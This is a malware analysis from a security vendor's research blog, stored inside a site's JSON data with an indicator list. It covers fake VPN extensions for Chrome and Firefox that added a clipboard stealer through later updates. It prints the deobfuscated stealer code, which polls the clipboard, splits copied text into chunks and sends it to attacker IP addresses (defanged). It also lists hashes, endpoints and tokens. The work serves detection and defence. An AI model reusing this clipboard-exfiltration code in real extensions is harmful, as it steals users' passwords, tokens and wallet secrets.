[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f350ZYmNLE8KAobG_tEJnKEq3Fq8G0AC9dN1Bmr5DvCw":3},{"article":4,"iocs":55},{"id":5,"title":6,"slug":7,"summary":8,"ai_summary":9,"brief":10,"full_text":11,"url":12,"image_url":13,"published_at":14,"ingested_at":15,"relevance_score":16,"entities":17,"category_id":32,"category":33,"article_tags":37},"3bd5cd34-735d-436e-b9e7-c2ea4ea2ae08","Chrome and Firefox Extensions Posing as Free VPNs Add Clipboard Stealers via Malicious Updates","chrome-and-firefox-extensions-posing-as-free-vpns-add-clipboard-stealers-via-mal-6615c2","Malicious Chrome and Firefox extensions posing as free VPNs added a clipboard stealer through staged updates, exfiltrating copied data to hardcoded threat actor-controlled infrastructure. Socket’s Threat Research Team analyzed two browser extensions operating under the VPN Go: Free VPN branding, one listed on the Chrome Web Store and another listed on Mozilla’s Firefox Add-ons marketplace. At the time of writing, the Chrome extension listed 146 users, while the Firefox extension showed 3,499 users. Both extensions present themselves as free VPN tools and include visible proxy functionality. Under the hood, both also contain malicious clipboard theft logic that continuously monitors copied text and exfiltrates it to threat actor-controlled infrastructure. Clipboard theft is an effective credential and secrets collection technique because it abuses normal user behavior rather than exploiting the host directly. Malware analysts often refer to clipboard-monitoring malware as clippers, especially when it steals copied secrets or swaps cryptocurrency addresses. Users routinely copy passwords, MFA codes, API keys, OAuth tokens, seed phrases, wallet addresses, and other high-value secrets. A browser extension with clipboard access does not need local persistence, shell execution, or a native payload to compromise them. It only needs the right permissions and a user who believes the extension is helping protect their privacy. Both the Chrome and Firefox VPN Go: Free VPN extensions show a staged malicious-update pattern. The initial analyzed Chrome version, 1.0, published on December 22, 2025, behaves like a proxy extension and does not contain the confirmed clipboard exfiltration chain. That changed in version 1.1, published on May 31, 2026, when the Chrome extension added clipboard theft logic that monitors copied text, chunks newly copied values, and sends them to hardcoded infrastructure. Chrome versions 1.1 and 1.2 exfiltrate clipboard data to hxxp:\u002F\u002F178[.]236[.]252[.]133\u002Fhtml\u002Fcontinue[.]php. Chrome version 1.3 keeps the clipboard theft behavior but moves its infrastructure to hxxp:\u002F\u002F77[.]91[.]123[.]187\u002Fhtml\u002Fcontinue[.]php. The Firefox extension follows the same staged malicious-update pattern. Earlier analyzed Firefox versions, including 1.1, 1.2, 1.3.1, and 1.3.2, behave like proxy extensions and do not contain the confirmed clipboard exfiltration chain. Firefox version 1.3.3 is the first analyzed Firefox version that contains the clipboard stealer, sending copied data to hxxp:\u002F\u002F178[.]236[.]252[.]161\u002Fhtml\u002Fcontinue[.]php. Version 1.3.4 preserves the clipboard theft behavior but moves its infrastructure to hxxp:\u002F\u002F77[.]91[.]123[.]187\u002Fhtml\u002Fcontinue[.]php. We have reported both extensions to Google and Mozilla for review and removal. Chrome Web Store listing for the malicious VPN Go: Free VPN extension. At the time of writing, the extension showed 146 users and appeared under the Privacy & Security category, giving a privacy-focused presentation despite the identified clipboard exfiltration behavior. Mozilla Firefox Add-ons listing for the malicious VPN Go extension. At the time of writing, the extension showed 3,499 users and a privacy-focused VPN presentation. # The Chrome Web Store listing presents VPN Go: Free VPN as a fast, secure VPN with global locations. At the time of writing, it showed version 1.3, updated on June 14, 2026, offered by zegivati83 with registration email zegivati83@gmail[.]com, and stated that the developer would not collect or use user data. The Firefox listing for Free VPN by VPN GO uses the same privacy-focused positioning, describing the extension as a free VPN for secure and unrestricted browsing. Yet its required permissions include clipboard access, proxy control, tab access, and access to data on all websites, while the listing also says the developer does not require data collection. The privacy policy reinforces the same misleading posture. It is hosted on Telegraph (hxxps:\u002F\u002Ftelegra[.]ph\u002FPrivacy-Policy-12-11-127), a low-friction publishing platform rather than a branded developer domain or a conventional company privacy page, and lists info@vpngogmail[.]com as the contact email. The policy claims VPN Go “does not collect, store, or process any personal data”, “does not share any user data”, “does not generate activity logs”, and creates an “encrypted VPN connection.” The code shows the opposite. The analyzed malicious Chrome and Firefox extensions read clipboard contents on a timer, split copied text into chunks, generate session identifiers, and transmit the data to hardcoded HTTP endpoints controlled by the threat actor. A VPN extension may legitimately need to control proxy settings. It may need to store server selections and proxy credentials. It may need network permissions to route browser traffic. It does not need to read the clipboard every half second. It does not need to split copied text into chunks. It does not need to send those chunks to a hardcoded IP address over HTTP. When the Chrome Extension Turned Malicious # The malicious Chrome branch begins in version 1.1. Version 1.2 preserves the same malicious implementation, while version 1.3 keeps the clipboard theft chain but moves to new infrastructure. The key manifest change is the addition of clipboard access and a content script that runs on every website. In the code snippets below, and throughout the rest of this write-up, malicious infrastructure is defanged where necessary. We also add analyst comments to highlight malicious functionality and intent. { \"content_scripts\": [ { \"matches\": [\" \"], \"run_at\": \"document_start\", \"js\": [\"scripts\u002Fversion.js\"] } ], \"permissions\": [ \"proxy\", \"storage\", \"webRequest\", \"clipboardRead\", \"webRequestAuthProvider\", \"alarms\" ], \"host_permissions\": [\" \"] } The extension now asks to read clipboard data and loads scripts\u002Fversion.js across all websites at document_start. This means the content script runs early in the page lifecycle and does not depend on the user pressing a VPN connect button. The script is lightly obfuscated with meaningless variable names, escaped property strings, and arithmetic constants. Once decoded, the behavior is direct: it reads the clipboard, skips duplicate values, chunks newly copied text, and sends those chunks to the extension background service worker. let lastClipboardText = null; let isReading = false; setInterval(async () => { \u002F\u002F Prevents concurrent clipboard reads across intervals. if (isReading) return; try { isReading = true; \u002F\u002F Reads the user's clipboard from the browser context. const text = await navigator.clipboard.readText(); \u002F\u002F Skips empty values and duplicate clipboard reads. if (!text || text === lastClipboardText) return; lastClipboardText = text; const chunks = []; const step = 1000 + Math.floor(19 * Math.random()); for (let i = 0; i { if (message.type === \"propConst\") { const { session, chunks } = message; chunks.forEach((chunk, index) => { \u002F\u002F Builds the exfiltration URL with the clipboard chunk in data. const url = \"hxxp:\u002F\u002F178[.]236[.]252[.]133\u002Fhtml\u002Fcontinue.php\" + \"?uid=\" + session + \"&part=\" + (index + 1) + \"&total=\" + chunks.length + \"&data=\" + encodeURIComponent(chunk); \u002F\u002F Sends the clipboard chunk and suppresses fetch responses or errors. fetch(url, { method: \"GET\", mode: \"no-cors\" }).catch(() => {}); }); } }); Versions 1.1 and 1.2 use hxxp:\u002F\u002F178[.]236[.]252[.]133\u002Fhtml\u002Fcontinue[.]php for clipboard exfiltration. They also use hxxp:\u002F\u002F178[.]236[.]252[.]133\u002Flocations to retrieve proxy locations. Version 1.3 keeps the same propConst exfiltration flow, but changes the exfiltration endpoint: const url = \"hxxp:\u002F\u002F77[.]91[.]123[.]187\u002Fhtml\u002Fcontinue.php\" + \"?uid=\" + session + \"&part=\" + (index + 1) + \"&total=\" + chunks.length + \"&data=\" + encodeURIComponent(chunk); Version 1.3 also moves the proxy location endpoint to the same IP: const API_URL = \"hxxp:\u002F\u002F77[.]91[.]123[.]187\u002Flocations\"; const API_TOKEN = \"Bearer 7386252b9a86e5357e6aa884326720abf015465a2567e75717830b6688ef05cc\"; Versions 1.1 and 1.2 use 178[.]236[.]252[.]133 for both clipboard exfiltration and proxy-location retrieval. Version 1.3 moves both functions to 77[.]91[.]123[.]187, the same IP observed in the malicious Firefox extension. Socket AI Scanner flagged VPN Go: Free VPN (ID\u002Fversion:jgpfgonjjolillilkjfkiddakagkkpoj@1.3 as known malware, identifying scripts\u002Fversion.js as an obfuscated Chrome extension content script that harvests clipboard contents, chunks copied values, tags them with a session identifier, and forwards them through Chrome runtime messaging for downstream exfiltration. # Firefox version 1.3.3 is the first analyzed Firefox build that contains the clipboard stealer, using 178[.]236[.]252[.]161 for both clipboard exfiltration and proxy-location retrieval. Version 1.3.4 preserves the same background-script theft pattern but moves the infrastructure to 77[.]91[.]123[.]187. The Firefox implementation is simpler than the Chrome branches. It does not rely on a content script or runtime message chain. Instead, it moves the clipboard theft loop into scripts\u002Fbackground.js, where it reads the clipboard directly, chunks newly copied text, builds the exfiltration URL from arithmetic fragments, and sends the data out over HTTP. \u002F\u002F Stores URL fragments, with IP octets derived from arithmetic expressions. const parts = [ \"http\", 154 \u002F 2, \u002F\u002F 77 182 \u002F 2, \u002F\u002F 91 246 \u002F 2, \u002F\u002F 123 374 \u002F 2, \u002F\u002F 187 \"html\u002Fcontinue\", \"php\" ]; \u002F\u002F Reassembles hxxp:\u002F\u002F77[.]91[.]123[.]187\u002Fhtml\u002Fcontinue[.]php. const buildUrl = () => parts .map((v, i) => i === 0 ? v + \":\u002F\u002F\" : i { \u002F\u002F Prevents overlapping clipboard-read intervals. if (isReading) return; isReading = true; try { \u002F\u002F Reads clipboard contents. const text = await navigator.clipboard.readText(); if (text && text !== lastClipboardText) { \u002F\u002F Skips duplicate clipboard values. lastClipboardText = text; const chunks = []; const step = 1000 + Math.floor(19 * Math.random()); for (let i = 0; i { \u002F\u002F Builds the exfiltration URL with the clipboard chunk in `data`. const fullUrl = buildUrl() + \"?uid=\" + session + \"&part=\" + (idx + 1) + \"&total=\" + chunks.length + \"&data=\" + encodeURIComponent(chunk); \u002F\u002F Exfiltrates copied text over HTTP and suppresses fetch errors. fetch(fullUrl, { method: \"GET\", mode: \"no-cors\" }).catch(() => {}); }); } } catch (err) { \u002F\u002F Suppresses clipboard access errors. } finally { isReading = false; } }, 1500); The Firefox extension polls the clipboard every 1.5 seconds. It uses the same chunking, session tagging, and continue.php exfiltration pattern as the Chrome branch, but embeds the full collection and exfiltration flow directly in the background script. Shared Code, Shared Infrastructure # Beyond branding, the Chrome and Firefox extensions are linked by shared infrastructure. Version 1.3 of the Chrome extension uses 77[.]91[.]123[.]187, the same IP observed in version 1.3.4 of the Firefox extension, for both clipboard exfiltration and proxy-location retrieval. Version 1.3.3 used a different malicious infrastructure host, 178[.]236[.]252[.]161, before version 1.3.4 moved to 77[.]91[.]123[.]187. The source also shows overlap. The Chrome extension version 1.3 manifest carries Firefox-specific settings that have no function in a Chrome extension: \"browser_specific_settings\": { \"gecko\": { \"id\": \"vpngo@vpngo[.]com\", \"strict_min_version\": \"142.0\", \"data_collection_permissions\": { \"required\": [\"browsingActivity\"] } } } The gecko.id value vpngo@vpngo[.]com matches the Firefox extension ID. A Chrome package does not need Gecko-specific settings, so their presence points to shared source material or a common build process rather than two unrelated projects. The clipboard exfiltration logic also follows the same structure once deobfuscated. The Chrome content script (scripts\u002Fversion.js) and the Firefox background script (scripts\u002Fbackground.js) both monitor clipboard contents, skip duplicate values, split copied text into roughly 1,000-character chunks, generate a base36 session identifier, and send the chunks through HTTP GET requests to \u002Fhtml\u002Fcontinue.php with uid, part, total, and data parameters. The Chrome implementation runs every 500 milliseconds through a content script and runtime message chain, while the Firefox implementation runs every 1.5 seconds directly from the background script. The implementation differs by browser, but the collection and exfiltration pattern is the same. Proxy Functionality as Cover # The VPN feature was not purely cosmetic. Static analysis shows that the Chrome and Firefox extensions were built to fetch proxy locations, display selectable locations, store selected proxy host and credential data, and route browser traffic through the selected proxy. In Chrome, the extension applies a fixed proxy configuration through chrome.proxy.settings.set and supplies proxy credentials through chrome.webRequest.onAuthRequired. In Firefox, the extension uses browser.proxy.onRequest to return proxy settings for browser requests and browser.webRequest.onAuthRequired to supply credentials. In both browsers, the visible VPN feature gives users a plausible reason to keep the extension installed and makes broad proxy permissions appear less suspicious. User feedback suggests that this visible VPN functionality was unreliable. The Firefox Add-ons listing showed a 2.7-star rating across 14 reviews, with seven one-star reviews. Some reviewers reported that the extension “doesn't work at all”, while another wrote that it “turns off every 10 seconds”. One user also reported that location selection did not work properly on Firefox for mobile. Google-translated Firefox Add-ons review page for the malicious VPN Go extension, showing a low 2.7-star rating and user reports of nonfunctional or unstable VPN behavior. The proxy-location endpoints track the campaign’s infrastructure changes. Chrome extension versions 1.1 and 1.2 retrieve proxy locations from hxxp:\u002F\u002F178[.]236[.]252[.]133\u002Flocations. Version 1.3 and Firefox version 1.3.4 use hxxp:\u002F\u002F77[.]91[.]123[.]187\u002Flocations. The Firefox extension version 1.3.3 uses hxxp:\u002F\u002F178[.]236[.]252[.]161\u002Flocations. These are the same infrastructure families used for clipboard exfiltration in the corresponding malicious versions. We did not dynamically connect through the proxy servers or validate service quality because doing so would generate traffic to malicious infrastructure. The static code is enough to show that the extensions were designed to function as proxy tools, not merely display a fake VPN interface. Based on the analyzed samples, the confirmed malicious behavior is clipboard exfiltration. The proxy capability still increases risk because it can route browser traffic through threat actor-supplied infrastructure, expose plaintext HTTP traffic and connection metadata, and make the extension appear useful while the clipboard monitor runs in parallel. Defensive Guidance # Users should remove VPN Go: Free VPN from Chrome and Free VPN by VPN GO from Firefox if installed. Any secrets copied while the extension was active should be treated as exposed. That includes passwords, API keys, GitHub tokens, cloud credentials, package registry tokens, OAuth tokens, MFA recovery codes, and cryptocurrency recovery material. Organizations should inventory browser extensions across managed endpoints. Extensions with clipboardRead, proxy, tabs, webRequest, webRequestBlocking, webRequestAuthProvider, and access to all websites should receive priority review. VPN, proxy, wallet, downloader, coupon, AI assistant, screenshot, and productivity extensions deserve extra scrutiny because they often request broad permissions and sit close to sensitive workflows. Security teams should threat hunt for outbound HTTP requests to the observed continue.php endpoints. Chrome 1.1 and 1.2 use 178[.]236[.]252[.]133. The Firefox extension version 1.3.3 uses 178[.]236[.]252[.]161. Chrome 1.3 and Firefox 1.3.4 use 77[.]91[.]123[.]187. The exfiltration pattern includes uid, part, total, and data query parameters. Enterprise teams should restrict extension installation to approved extension IDs, use browser management policies, and review every permission change before allowing updates. A new clipboardRead permission or all websites content script should trigger investigation, especially when the extension’s stated purpose does not require clipboard access. MITRE ATT&CK # T1176.001 — Software Extensions: Browser Extensions T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain T1204 — User Execution T1059.007 — Command and Scripting Interpreter: JavaScript T1115 — Clipboard Data T1027 — Obfuscated Files or Information T1071.001 — Application Layer Protocol: Web Protocols T1041 — Exfiltration Over C2 Channel T1036 — Masquerading # Chrome Extension Name: VPN Go: Free VPN Extension ID: jgpfgonjjolillilkjfkiddakagkkpoj Developer listed on Chrome Web Store: zegivati83 Developer email listed on Chrome Web Store: zegivati83@gmail[.]com Privacy policy URL: hxxps:\u002F\u002Ftelegra[.]ph\u002FPrivacy-Policy-12-11-127 Privacy policy contact email: info@vpngogmail[.]com Chrome CRX SHA256 Version 1.1, confirmed malicious: 43dc5b1d4c73d5ed9f4f7f561830079896eeb533a7c21bc577e4e267d5a3aa56 Version 1.2, confirmed malicious: b3b63970833b3379ecec2d3ef8fea328fef8dd1c1574b1bcdfebad5bdce9280c Version 1.3, confirmed malicious: 72fc06a8b03720f4a64744eecd5b3f658ad880bdb327c0c465c7bdc66b14a8d2 Chrome 1.1 and 1.2 Infrastructure IP address: 178[.]236[.]252[.]133 Clipboard exfiltration endpoint: hxxp:\u002F\u002F178[.]236[.]252[.]133\u002Fhtml\u002Fcontinue[.]php Proxy-location endpoint: hxxp:\u002F\u002F178[.]236[.]252[.]133\u002Flocations Bearer token: 11f01e8296a074e6e3b23e9413c51f205d4b6a14146fb4d95bec291d768a9071 Chrome 1.3 Infrastructure IP address: 77[.]91[.]123[.]187 Clipboard exfiltration endpoint: hxxp:\u002F\u002F77[.]91[.]123[.]187\u002Fhtml\u002Fcontinue[.]php Proxy-location endpoint: hxxp:\u002F\u002F77[.]91[.]123[.]187\u002Flocations Bearer token: 7386252b9a86e5357e6aa884326720abf015465a2567e75717830b6688ef05cc Firefox Extension Public name: Free VPN by VPN GO Manifest name: VPN Go Gecko ID: vpngo@vpngo[.]com Firefox XPI SHA256 Version 1.3.3, confirmed malicious: fbbdf4bc490ad7b28953630c1707aa68b89d319b9b735f3d8563320b81b21a97 Version 1.3.4, confirmed malicious: 2fe9c41901045013ba28ccb9af5870f9aef4f1ffd1e717cd5e0189ffdbe7fca2 Firefox 1.3.3 Infrastructure IP address: 178[.]236[.]252[.]161 Clipboard exfiltration endpoint: hxxp:\u002F\u002F178[.]236[.]252[.]161\u002Fhtml\u002Fcontinue[.]php Proxy-location endpoint: hxxp:\u002F\u002F178[.]236[.]252[.]161\u002Flocations Bearer token: d7d43e8e8f03afdcaaba85622daf24ced944e7ca4d03ac124fc325d0bb6e3d66 Firefox 1.3.4 Infrastructure IP address: 77[.]91[.]123[.]187 Clipboard exfiltration endpoint: hxxp:\u002F\u002F77[.]91[.]123[.]187\u002Fhtml\u002Fcontinue[.]php Proxy-location endpoint: hxxp:\u002F\u002F77[.]91[.]123[.]187\u002Flocations Bearer token: 638636692e3eef6c83dbca784a40fb7b6ac95b76d6551a2fbdfebc11588ad8ff Shared Exfiltration Pattern Endpoint path: \u002Fhtml\u002Fcontinue[.]php Query parameter: uid Query parameter: part Query parameter: total Query parameter: data JavaScript API: navigator.clipboard.readText Fetch mode: no-cors","Malicious browser extensions masquerading as free VPNs, branded 'VPN Go: Free VPN', have been updated to include clipboard-stealing capabilities. These extensions, available on the Chrome Web Store and Mozilla's Firefox Add-ons marketplace, exfiltrate copied data like passwords, API keys, and MFA codes to threat actor-controlled infrastructure. The malicious functionality was introduced through staged updates, with earlier versions acting as legitimate proxy tools before the addition of the clipboard stealer.","Malicious VPN extensions for Chrome and Firefox were updated to steal clipboard data.","Research\u002FSecurity NewsMiasma Mini Shai-Hulud Hits ImmobiliareLabs npm PackagesMiasma Mini Shai-Hulud hits @immobiliarelabs Backstage plugins, targeting GitLab and LDAP auth packages on npm.By Socket Research Team - Jun 26, 2026","https:\u002F\u002Fsocket.dev\u002Fblog\u002Fchrome-and-firefox-extensions-free-vpns-add-clipboard-stealers?utm_medium=feed","https:\u002F\u002Fcdn.sanity.io\u002Fimages\u002Fcgdhsj6q\u002Fproduction\u002F48040b4ff26b3626a605a8b69b3b6fd48abf5559-1672x941.png?w=1000&q=95&fit=max&auto=format","2026-06-29T21:18:05.512+00:00","2026-06-30T00:00:27.126967+00:00",8,[18,21,23,25,27,30],{"name":19,"type":20},"Chrome Web Store","product",{"name":22,"type":20},"Firefox Add-ons marketplace",{"name":24,"type":20},"VPN Go: Free VPN",{"name":26,"type":20},"Free VPN by VPN GO",{"name":28,"type":29},"Google","vendor",{"name":31,"type":29},"Mozilla","89f78b1c-3503-45a1-9fc7-e23d2ce1c6d5",{"id":32,"icon":34,"name":35,"slug":36},null,"Malware","malware",[38,43,45,50],{"category":39},{"id":40,"icon":34,"name":41,"slug":42},"80544778-fabb-4dcd-aa35-17492e5dcf4f","Vulnerabilities","vulnerabilities",{"category":44},{"id":32,"icon":34,"name":35,"slug":36},{"category":46},{"id":47,"icon":34,"name":48,"slug":49},"ade75414-7914-4e23-a450-48b64546ee70","Open Source","open-source",{"category":51},{"id":52,"icon":34,"name":53,"slug":54},"e7b231c8-5f79-4465-8d38-1ef13aea5a14","Threat Intelligence","threat-intelligence",[56,60,63,66,70,73,76,79,82,85,89,92,95,98,101,105,108,111,114,117,120],{"type":57,"value":58,"context":59},"ip","178.236.252.133","IP address used by Chrome v1.1\u002F1.2 and Firefox v1.3.3 for exfiltration and proxy location retrieval.",{"type":57,"value":61,"context":62},"77.91.123.187","IP address used by Chrome v1.3 and Firefox v1.3.4 for exfiltration and proxy location retrieval.",{"type":57,"value":64,"context":65},"178.236.252.161","IP address used by Firefox v1.3.3 for exfiltration and proxy location retrieval.",{"type":67,"value":68,"context":69},"url","hxxp:\u002F\u002F178.236.252.133\u002Fhtml\u002Fcontinue.php","Clipboard exfiltration endpoint for Chrome v1.1\u002F1.2.",{"type":67,"value":71,"context":72},"hxxp:\u002F\u002F77.91.123.187\u002Fhtml\u002Fcontinue.php","Clipboard exfiltration endpoint for Chrome v1.3 and Firefox v1.3.4.",{"type":67,"value":74,"context":75},"hxxp:\u002F\u002F178.236.252.161\u002Fhtml\u002Fcontinue.php","Clipboard exfiltration endpoint for Firefox v1.3.3.",{"type":67,"value":77,"context":78},"hxxp:\u002F\u002F178.236.252.133\u002Flocations","Proxy location retrieval endpoint for Chrome v1.1\u002F1.2.",{"type":67,"value":80,"context":81},"hxxp:\u002F\u002F77.91.123.187\u002Flocations","Proxy location retrieval endpoint for Chrome v1.3 and Firefox v1.3.4.",{"type":67,"value":83,"context":84},"hxxp:\u002F\u002F178.236.252.161\u002Flocations","Proxy location retrieval endpoint for Firefox v1.3.3.",{"type":86,"value":87,"context":88},"hash_sha256","43dc5b1d4c73d5ed9f4f7f561830079896eeb533a7c21bc577e4e267d5a3aa56","SHA256 hash for malicious Chrome extension VPN Go: Free VPN v1.1.",{"type":86,"value":90,"context":91},"b3b63970833b3379ecec2d3ef8fea328fef8dd1c1574b1bcdfebad5bdce9280c","SHA256 hash for malicious Chrome extension VPN Go: Free VPN v1.2.",{"type":86,"value":93,"context":94},"72fc06a8b03720f4a64744eecd5b3f658ad880bdb327c0c465c7bdc66b14a8d2","SHA256 hash for malicious Chrome extension VPN Go: Free VPN v1.3.",{"type":86,"value":96,"context":97},"fbbdf4bc490ad7b28953630c1707aa68b89d319b9b735f3d8563320b81b21a97","SHA256 hash for malicious Firefox extension Free VPN by VPN GO v1.3.3.",{"type":86,"value":99,"context":100},"2fe9c41901045013ba28ccb9af5870f9aef4f1ffd1e717cd5e0189ffdbe7fca2","SHA256 hash for malicious Firefox extension Free VPN by VPN GO v1.3.4.",{"type":102,"value":103,"context":104},"mitre_attack","T1115","Clipboard Data",{"type":102,"value":106,"context":107},"T1059.007","Command and Scripting Interpreter: JavaScript",{"type":102,"value":109,"context":110},"T1071.001","Application Layer Protocol: Web Protocols",{"type":102,"value":112,"context":113},"T1041","Exfiltration Over C2 Channel",{"type":102,"value":115,"context":116},"T1036","Masquerading",{"type":102,"value":118,"context":119},"T1176.001","Software Extensions: Browser Extensions",{"type":102,"value":121,"context":122},"T1027","Obfuscated Files or Information"]